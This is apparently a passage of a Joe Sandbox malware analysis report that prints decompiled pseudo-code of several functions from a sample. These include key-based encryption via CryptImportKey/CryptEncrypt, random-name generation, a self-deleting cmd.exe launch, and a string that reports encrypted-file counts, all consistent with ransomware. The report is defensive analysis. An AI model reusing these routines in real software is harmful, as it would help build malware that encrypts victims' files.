                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Virtual$AllocFree$BinaryCryptErrorLastString_memsetwsprintf
                                        • String ID: #shasj$action=result&e_files=%d&e_size=%I64u&e_time=%d&
                                        • API String ID: 2994799111-4131875188
                                        • Opcode ID: b97c54c66967e5881f31c2355ab5d60a25196413129584c32ae6a99e7494c735
                                        • Instruction ID: 4b3846844843bca3adad47a4416aa51267287b95fb9ecbd376b45b9ad7cf64d3
                                        • Opcode Fuzzy Hash: b97c54c66967e5881f31c2355ab5d60a25196413129584c32ae6a99e7494c735
                                        • Instruction Fuzzy Hash: 0F51E171904219ABEB20EBA4DC45FEEBB7DEF44300F644064FA05A71C2EB746A54CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D5210 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 145memorystringencryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 73%
                                        			E0F9D5210(CHAR* __ecx, CHAR** __edx) {
				int _v8;
				long _v12;
				char _v14;
				void* _v16;
				void* _v20;
				void* _v24;
				char _v28;
				CHAR** _v32;
				void* _v36;
				char _v291;
				char _v292;
				void* _v348;
				void* _v352;
				int _t43;
				BYTE* _t44;
				int _t46;
				void* _t50;
				void* _t51;
				char _t52;
				void* _t64;
				signed int _t66;
				signed int _t68;
				int _t69;
				int _t72;
				char _t74;
				intOrPtr _t75;
				CHAR* _t84;
				char* _t86;
				void* _t88;
				signed char _t89;
				WCHAR* _t94;
				CHAR* _t95;
				BYTE* _t101;
				WCHAR* _t102;
				WCHAR* _t103;
				void* _t104;
				long _t105;
				long _t106;
				int _t107;
				void* _t108;
				CHAR* _t109;
				void* _t110;

				_t86 = __ecx;
				_v32 = __edx;
				_t43 = lstrlenA(__ecx) + 1;
				_v8 = _t43;
				_t3 = _t43 + 1; // 0x2
				_t105 = _t3;
				_t44 = VirtualAlloc(0, _t105, 0x3000, 0x40);
				_v36 = _t44;
				if(_t44 == 0 || _v8 >= _t105) {
					_t101 = 0;
					__eflags = 0;
				} else {
					_t101 = _t44;
				}
				_t106 = 0;
				_t46 = CryptStringToBinaryA(_t86, 0, 1, _t101,  &_v8, 0, 0);
				_t119 = _t46;
				if(_t46 == 0) {
					GetLastError();
					goto L14;
				} else {
					_t50 = "#shasj"; // 0x61687323
					asm("movq xmm0, [0xf9dfc78]");
					_t107 = _v8;
					_v20 = _t50;
					_t51 =  *0xf9dfc84; // 0x6a73
					_v16 = _t51;
					_t52 =  *0xf9dfc86; // 0x0
					_v14 = _t52;
					asm("movq [ebp-0x18], xmm0");
					_v292 = 0;
					E0F9D9010( &_v291, 0, 0xff);
					E0F9D5D70( &_v292,  &_v28, lstrlenA( &_v28));
					E0F9D5E20( &_v292, _t101, _t107);
					_t94 =  &_v28;
					asm("xorps xmm0, xmm0");
					asm("movdqu [ebp-0x18], xmm0");
					E0F9D33E0(_t94, _t119, _t101);
					if(_v28 != 0) {
						E0F9D5190();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(lstrlenA);
						_push(_t107);
						_push(_t101);
						_t102 = _t94;
						_t108 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
						_v352 = _t108;
						GetModuleFileNameW(0, _t108, 0x200);
						_t88 = CreateFileW(_t108, 0x80000000, 1, 0, 3, 0x80, 0);
						_v348 = _t88;
						__eflags = _t88 - 0xffffffff;
						if(_t88 != 0xffffffff) {
							_t64 = CreateFileMappingW(_t88, 0, 8, 0, 0, 0);
							_v28 = _t64;
							__eflags = _t64;
							if(_t64 != 0) {
								_t66 = MapViewOfFile(_t64, 1, 0, 0, 0);
								_v16 = _t66;
								__eflags = _t66;
								if(_t66 != 0) {
									_t29 = _t66 + 0x4e; // 0x4e
									_t109 = _t29;
									_v12 = _t109;
									_t68 = lstrlenW(_t102);
									_t89 = 0;
									_t103 =  &(_t102[_t68]);
									_t69 = lstrlenA(_t109);
									__eflags = _t69 + _t69;
									if(_t69 + _t69 != 0) {
										_t95 = _t109;
										do {
											__eflags = _t89 & 0x00000001;
											if((_t89 & 0x00000001) != 0) {
												 *((char*)(_t103 + _t89)) = 0;
											} else {
												_t74 =  *_t109;
												_t109 =  &(_t109[1]);
												 *((char*)(_t103 + _t89)) = _t74;
											}
											_t89 = _t89 + 1;
											_t72 = lstrlenA(_t95);
											_t95 = _v12;
											__eflags = _t89 - _t72 + _t72;
										} while (_t89 < _t72 + _t72);
									}
									UnmapViewOfFile(_v16);
									_t88 = _v20;
									_t108 = _v24;
								}
								CloseHandle(_v28);
							}
							CloseHandle(_t88);
						}
						return VirtualFree(_t108, 0, 0x8000);
					} else {
						_t104 = _v24;
						_t75 =  *0xf9e2a60; // 0x0
						_t110 = _v20;
						_t76 =  !=  ? 0 : _t75;
						_v12 = 1;
						 *0xf9e2a60 =  !=  ? 0 : _t75;
						if(_t110 != 0) {
							_t84 = VirtualAlloc(0, lstrlenA(_t110) + 1, 0x3000, 4);
							 *_v32 = _t84;
							if(_t84 != 0) {
								lstrcpyA(_t84, _t110);
							}
						}
						_t77 = GetProcessHeap;
						if(_t104 != 0) {
							HeapFree(GetProcessHeap(), 0, _t104);
							_t77 = GetProcessHeap;
						}
						if(_t110 != 0) {
							HeapFree( *_t77(), 0, _t110);
						}
						_t106 = _v12;
						L14:
						VirtualFree(_v36, 0, 0x8000);
						return _t106;
					}
				}
			}













































                                        0x0f9d521c
                                        0x0f9d521e
                                        0x0f9d5228
                                        0x0f9d5230
                                        0x0f9d5233
                                        0x0f9d5233
                                        0x0f9d5239
                                        0x0f9d523f
                                        0x0f9d5244
                                        0x0f9d524f
                                        0x0f9d524f
                                        0x0f9d524b
                                        0x0f9d524b
                                        0x0f9d524b
                                        0x0f9d5251
                                        0x0f9d525e
                                        0x0f9d5264
                                        0x0f9d5266
                                        0x0f9d5385
                                        0x00000000
                                        0x0f9d526c
                                        0x0f9d526c
                                        0x0f9d5271
                                        0x0f9d5279
                                        0x0f9d527c
                                        0x0f9d527f
                                        0x0f9d5285
                                        0x0f9d5289
                                        0x0f9d5293
                                        0x0f9d529f
                                        0x0f9d52a4
                                        0x0f9d52ab
                                        0x0f9d52c9
                                        0x0f9d52d7
                                        0x0f9d52df
                                        0x0f9d52e2
                                        0x0f9d52e5
                                        0x0f9d52eb
                                        0x0f9d52f4
                                        0x0f9d538d
                                        0x0f9d5392
                                        0x0f9d5393
                                        0x0f9d5394
                                        0x0f9d5395
                                        0x0f9d5396
                                        0x0f9d5397
                                        0x0f9d5398
                                        0x0f9d5399
                                        0x0f9d539a
                                        0x0f9d539b
                                        0x0f9d539c
                                        0x0f9d539d
                                        0x0f9d539e
                                        0x0f9d539f
                                        0x0f9d53a6
                                        0x0f9d53a7
                                        0x0f9d53a8
                                        0x0f9d53b7
                                        0x0f9d53bf
                                        0x0f9d53c9
                                        0x0f9d53cc
                                        0x0f9d53eb
                                        0x0f9d53ed
                                        0x0f9d53f0
                                        0x0f9d53f3
                                        0x0f9d5404
                                        0x0f9d540a
                                        0x0f9d540d
                                        0x0f9d540f
                                        0x0f9d541a
                                        0x0f9d5420
                                        0x0f9d5423
                                        0x0f9d5425
                                        0x0f9d5427
                                        0x0f9d5427
                                        0x0f9d542b
                                        0x0f9d542e
                                        0x0f9d5435
                                        0x0f9d5437
                                        0x0f9d543a
                                        0x0f9d5440
                                        0x0f9d5442
                                        0x0f9d5444
                                        0x0f9d5446
                                        0x0f9d5446
                                        0x0f9d5449
                                        0x0f9d5453
                                        0x0f9d544b
                                        0x0f9d544b
                                        0x0f9d544d
                                        0x0f9d544e
                                        0x0f9d544e
                                        0x0f9d5458
                                        0x0f9d5459
                                        0x0f9d545f
                                        0x0f9d5464
                                        0x0f9d5464
                                        0x0f9d5446
                                        0x0f9d546b
                                        0x0f9d5471
                                        0x0f9d5474
                                        0x0f9d5474
                                        0x0f9d547a
                                        0x0f9d547a
                                        0x0f9d5481
                                        0x0f9d5481
                                        0x0f9d549b
                                        0x0f9d52fa
                                        0x0f9d52fa
                                        0x0f9d52ff
                                        0x0f9d5306
                                        0x0f9d5309
                                        0x0f9d530c
                                        0x0f9d5313
                                        0x0f9d531a
                                        0x0f9d532a
                                        0x0f9d5333
                                        0x0f9d5337
                                        0x0f9d533b
                                        0x0f9d533b
                                        0x0f9d5337
                                        0x0f9d5347
                                        0x0f9d534e
                                        0x0f9d5356
                                        0x0f9d5358
                                        0x0f9d5358
                                        0x0f9d535f
                                        0x0f9d5367
                                        0x0f9d5367
                                        0x0f9d5369
                                        0x0f9d536c
                                        0x0f9d5376
                                        0x0f9d5384
                                        0x0f9d5384
                                        0x0f9d52f4

                                        APIs
                                        • lstrlenA.KERNEL32(?,00000001,?,?), ref: 0F9D5222
                                        • VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 0F9D5239
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0F9D525E
                                        • _memset.LIBCMT ref: 0F9D52AB
                                        • lstrlenA.KERNEL32(?), ref: 0F9D52BD
                                        • lstrlenA.KERNEL32(?,00003000,00000004,00000000), ref: 0F9D5324
                                        • VirtualAlloc.KERNEL32(00000000,00000001), ref: 0F9D532A
                                        • lstrcpyA.KERNEL32(00000000,?), ref: 0F9D533B
                                        • HeapFree.KERNEL32(00000000), ref: 0F9D5356
                                        • HeapFree.KERNEL32(00000000), ref: 0F9D5367
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5376
                                        • GetLastError.KERNEL32 ref: 0F9D5385
                                          • Part of subcall function 0F9D5190: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0F9D5392,00000000), ref: 0F9D51A6
                                          • Part of subcall function 0F9D5190: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F9D51B8
                                          • Part of subcall function 0F9D5190: GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 0F9D51C8
                                          • Part of subcall function 0F9D5190: wsprintfW.USER32 ref: 0F9D51D9
                                          • Part of subcall function 0F9D5190: ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0F9D51F3
                                          • Part of subcall function 0F9D5190: ExitProcess.KERNEL32 ref: 0F9D51FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Alloc$Freelstrlen$Heap$BinaryCryptErrorExecuteExitFileLastModuleNameProcessShellString_memsetlstrcpywsprintf
                                        • String ID: #shasj
                                        • API String ID: 834684195-2423951532
                                        • Opcode ID: cfa8315b72d8639660257b935eb3bcbf1aad53b2cf44e388a7e2ab260f820f3e
                                        • Instruction ID: cd4991fc8194d4aa471413fed75ff32b5195dccf4f5fbfb1cdcb4ee1be2f606e
                                        • Opcode Fuzzy Hash: cfa8315b72d8639660257b935eb3bcbf1aad53b2cf44e388a7e2ab260f820f3e
                                        • Instruction Fuzzy Hash: 5B41F631A05215ABEB209BA4DC44BEFBB7CEF49711F244114F905E3282DB789950CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D8150 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111encryptionlibrarymemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 66%
                                        			E0F9D8150(intOrPtr __ecx, void* __edx) {
				long* _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t37;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t46;
				signed int _t54;
				long _t55;
				intOrPtr _t56;
				signed int _t58;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t65;

				_t54 = 0;
				_v12 = __ecx;
				_t37 =  &_v8;
				_t63 = __edx;
				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000);
				if(_t37 == 0) {
					L15:
					return _t54;
				} else {
					_t58 = 0;
					do {
						_t3 = _t58 + 0x61; // 0x61
						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
						_t58 = _t58 + 1;
					} while (_t58 < 0x1a);
					_t7 = _t63 + 1; // 0x1
					_t55 = _t7;
					_t64 = VirtualAlloc(0, _t55, 0x3000, 0x40);
					if(_t64 == 0 || _t63 >= _t55) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t45 = GetModuleHandleA( &_v32);
						if(_t45 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t46 = GetProcAddress(_t45, _t19);
							if(_t46 == 0) {
								goto L13;
							} else {
								_push(_t64);
								_push(_t63);
								_push(_v8);
								if( *_t46() == 0) {
									goto L13;
								} else {
									_t60 = 0;
									if(_t63 != 0) {
										_t56 = _v12;
										_v16 = 0x1a;
										do {
											asm("cdq");
											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
											_t60 = _t60 + 1;
										} while (_t60 < _t63);
									}
									_t54 = 1;
								}
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t45 = LoadLibraryA(_t18);
							if(_t45 == 0) {
								L13:
								_t54 = 0;
							} else {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						goto L15;
					}
				}
			}


























                                        0x0f9d8160
                                        0x0f9d8162
                                        0x0f9d8167
                                        0x0f9d816a
                                        0x0f9d816d
                                        0x0f9d8175
                                        0x0f9d8269
                                        0x0f9d8271
                                        0x0f9d817b
                                        0x0f9d817b
                                        0x0f9d8180
                                        0x0f9d8180
                                        0x0f9d8183
                                        0x0f9d8188
                                        0x0f9d8189
                                        0x0f9d8195
                                        0x0f9d8195
                                        0x0f9d81a1
                                        0x0f9d81a5
                                        0x0f9d8277
                                        0x0f9d8285
                                        0x0f9d8293
                                        0x0f9d81b3
                                        0x0f9d81b6
                                        0x0f9d81be
                                        0x0f9d81c5
                                        0x0f9d81cc
                                        0x0f9d81d2
                                        0x0f9d81d6
                                        0x0f9d81dd
                                        0x0f9d81e4
                                        0x0f9d81eb
                                        0x0f9d81ef
                                        0x0f9d81f7
                                        0x0f9d8207
                                        0x0f9d8207
                                        0x0f9d820c
                                        0x0f9d8214
                                        0x00000000
                                        0x0f9d8216
                                        0x0f9d8216
                                        0x0f9d8217
                                        0x0f9d8218
                                        0x0f9d821f
                                        0x00000000
                                        0x0f9d8221
                                        0x0f9d8221
                                        0x0f9d8225
                                        0x0f9d8227
                                        0x0f9d822a
                                        0x0f9d8231
                                        0x0f9d8235
                                        0x0f9d823e
                                        0x0f9d8242
                                        0x0f9d8243
                                        0x0f9d8231
                                        0x0f9d8247
                                        0x0f9d8247
                                        0x0f9d821f
                                        0x0f9d81f9
                                        0x0f9d81f9
                                        0x0f9d81fd
                                        0x0f9d8205
                                        0x0f9d824e
                                        0x0f9d824e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d8205
                                        0x0f9d8255
                                        0x0f9d8263
                                        0x00000000
                                        0x0f9d8263
                                        0x0f9d81a5

                                        APIs
                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F9D816D
                                        • VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F9D819B
                                        • GetModuleHandleA.KERNEL32(?), ref: 0F9D81EF
                                        • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F9D81FD
                                        • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F9D820C
                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D8255
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D8263
                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D8277
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D8285
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                        • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                        • API String ID: 3996966626-2152921537
                                        • Opcode ID: 217b79c387d5fa74c61f79f8b531a21c3491a706a9592a5d4fc057d931616994
                                        • Instruction ID: da1cbb7ee9285fb786599efd7a496e4bd1b62b50363972ba320919c10a7655e4
                                        • Opcode Fuzzy Hash: 217b79c387d5fa74c61f79f8b531a21c3491a706a9592a5d4fc057d931616994
                                        • Instruction Fuzzy Hash: BC31F874A05209ABEB208FE5DC49BEEBB7CEF05751F308069FA01E6182D7749621CB65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D82A0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 96encryptionlibrarymemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 75%
                                        			E0F9D82A0(intOrPtr __ecx, intOrPtr __edx) {
				long* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t25;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t34;
				long _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t48;

				_t46 = 0;
				_v16 = __ecx;
				_t25 =  &_v8;
				_v12 = __edx;
				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000);
				if(_t25 == 0) {
					L10:
					return _t46;
				} else {
					_t42 = 0;
					do {
						_t4 = _t42 + 0x61; // 0x61
						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
						_t42 = _t42 + 1;
					} while (_t42 < 0x1a);
					_t40 = __edx + 1;
					_t47 = VirtualAlloc(0, _t40, 0x3000, 0x40);
					if(_t47 == 0 || _v12 >= _t40) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t33 = GetModuleHandleA( &_v32);
						if(_t33 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t34 = GetProcAddress(_t33, _t19);
							if(_t34 != 0) {
								 *_t34(_v8, _v12, _v16);
								_t46 =  !=  ? 1 : _t46;
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t33 = LoadLibraryA(_t18);
							if(_t33 != 0) {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						goto L10;
					}
				}
			}























                                        0x0f9d82b0
                                        0x0f9d82b2
                                        0x0f9d82b7
                                        0x0f9d82bd
                                        0x0f9d82c0
                                        0x0f9d82c8
                                        0x0f9d8392
                                        0x0f9d839a
                                        0x0f9d82ce
                                        0x0f9d82ce
                                        0x0f9d82d0
                                        0x0f9d82d0
                                        0x0f9d82d3
                                        0x0f9d82d7
                                        0x0f9d82d8
                                        0x0f9d82e4
                                        0x0f9d82ee
                                        0x0f9d82f2
                                        0x0f9d83a0
                                        0x0f9d83ae
                                        0x0f9d83bc
                                        0x0f9d8301
                                        0x0f9d8304
                                        0x0f9d830c
                                        0x0f9d8313
                                        0x0f9d831a
                                        0x0f9d8320
                                        0x0f9d8324
                                        0x0f9d832b
                                        0x0f9d8332
                                        0x0f9d8339
                                        0x0f9d833d
                                        0x0f9d8345
                                        0x0f9d8355
                                        0x0f9d8355
                                        0x0f9d835a
                                        0x0f9d8362
                                        0x0f9d836d
                                        0x0f9d8376
                                        0x0f9d8376
                                        0x0f9d8347
                                        0x0f9d8347
                                        0x0f9d834b
                                        0x0f9d8353
                                        0x00000000
                                        0x00000000
                                        0x0f9d8353
                                        0x0f9d837e
                                        0x0f9d838c
                                        0x00000000
                                        0x0f9d838c
                                        0x0f9d82f2

                                        APIs
                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F9D82C0
                                        • VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0F9D82E8
                                        • GetModuleHandleA.KERNEL32(?), ref: 0F9D833D
                                        • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F9D834B
                                        • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F9D835A
                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D837E
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D838C
                                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F9D292B), ref: 0F9D83A0
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F9D292B), ref: 0F9D83AE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                        • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                        • API String ID: 3996966626-2152921537
                                        • Opcode ID: 1acb6d514d3d6e8ef9ad942e6a13a0f4b5f68ffa94ae3dabd409e1b26e424e1c
                                        • Instruction ID: 210382d2c5051aeefabdf87173a93d34e64520cb74e5883e852665db8d95455a
                                        • Opcode Fuzzy Hash: 1acb6d514d3d6e8ef9ad942e6a13a0f4b5f68ffa94ae3dabd409e1b26e424e1c
                                        • Instruction Fuzzy Hash: 3B31F871A05209AFEB20DFA5DC49BEEBB7CEF05711F204059F605E2182D7789A20CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D6530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 89encryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 54%
                                        			E0F9D6530(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, intOrPtr _a20) {
				long* _v8;
				long* _v12;
				int _v16;
				char _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long** _t26;
				char* _t31;
				int _t33;
				long _t36;

				EnterCriticalSection(0xf9e2a48);
				_v8 = 0;
				_v12 = 0;
				_t26 =  &_v8;
				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
				if(_t26 != 0) {
					L6:
					_v16 = 0;
					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
						_v20 = 0xa;
						_t31 =  &_v20;
						__imp__CryptGetKeyParam(_v12, 8,  &_v28, _t31, 0);
						_v32 = _t31;
						 *_a16 = 0xc8;
						_t33 = _a12;
						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16, _a20);
						_v16 = _t33;
						_v24 = GetLastError();
						if(_v16 == 0) {
							E0F9D34F0(_t34);
						}
					}
					CryptReleaseContext(_v8, 0);
					LeaveCriticalSection(0xf9e2a48);
					return _v16;
				}
				_t36 = GetLastError();
				if(_t36 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t36 != 0) {
					goto L6;
				}
				return 0;
			}














                                        0x0f9d653b
                                        0x0f9d6541
                                        0x0f9d6548
                                        0x0f9d655a
                                        0x0f9d655e
                                        0x0f9d6566
                                        0x0f9d659e
                                        0x0f9d659e
                                        0x0f9d65c1
                                        0x0f9d65c3
                                        0x0f9d65cc
                                        0x0f9d65da
                                        0x0f9d65e0
                                        0x0f9d65e6
                                        0x0f9d65f4
                                        0x0f9d6602
                                        0x0f9d6608
                                        0x0f9d6611
                                        0x0f9d6618
                                        0x0f9d661d
                                        0x0f9d661d
                                        0x0f9d6618
                                        0x0f9d6628
                                        0x0f9d6633
                                        0x00000000
                                        0x0f9d6639
                                        0x0f9d6568
                                        0x0f9d6573
                                        0x00000000
                                        0x0f9d6597
                                        0x0f9d6584
                                        0x0f9d658c
                                        0x00000000
                                        0x0f9d6595
                                        0x00000000

                                        APIs
                                        • EnterCriticalSection.KERNEL32(0F9E2A48,?,0F9D3724,00000000,00000000,00000000,?,00000800), ref: 0F9D653B
                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,0F9D3724,00000000,00000000,00000000), ref: 0F9D655E
                                        • GetLastError.KERNEL32(?,0F9D3724,00000000,00000000,00000000), ref: 0F9D6568
                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F9D3724,00000000,00000000,00000000), ref: 0F9D6584
                                        • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,0F9D3724,00000000,00000000), ref: 0F9D65B9
                                        • CryptGetKeyParam.ADVAPI32(00000000,00000008,0F9D3724,0000000A,00000000,?,0F9D3724,00000000), ref: 0F9D65DA
                                        • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,0F9D3724,?,0F9D3724,00000000), ref: 0F9D6602
                                        • GetLastError.KERNEL32(?,0F9D3724,00000000), ref: 0F9D660B
                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0F9D3724,00000000,00000000), ref: 0F9D6628
                                        • LeaveCriticalSection.KERNEL32(0F9E2A48,?,0F9D3724,00000000,00000000), ref: 0F9D6633
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                        • API String ID: 72144047-1948191093
                                        • Opcode ID: 640c6eda210cbc1d863902ec381ea2714d88c1b32a177602f3890782522d60d0
                                        • Instruction ID: b93ff390acc2f02cb71f1f880095a8752a233601122ff60c9f66d648c7cb098d
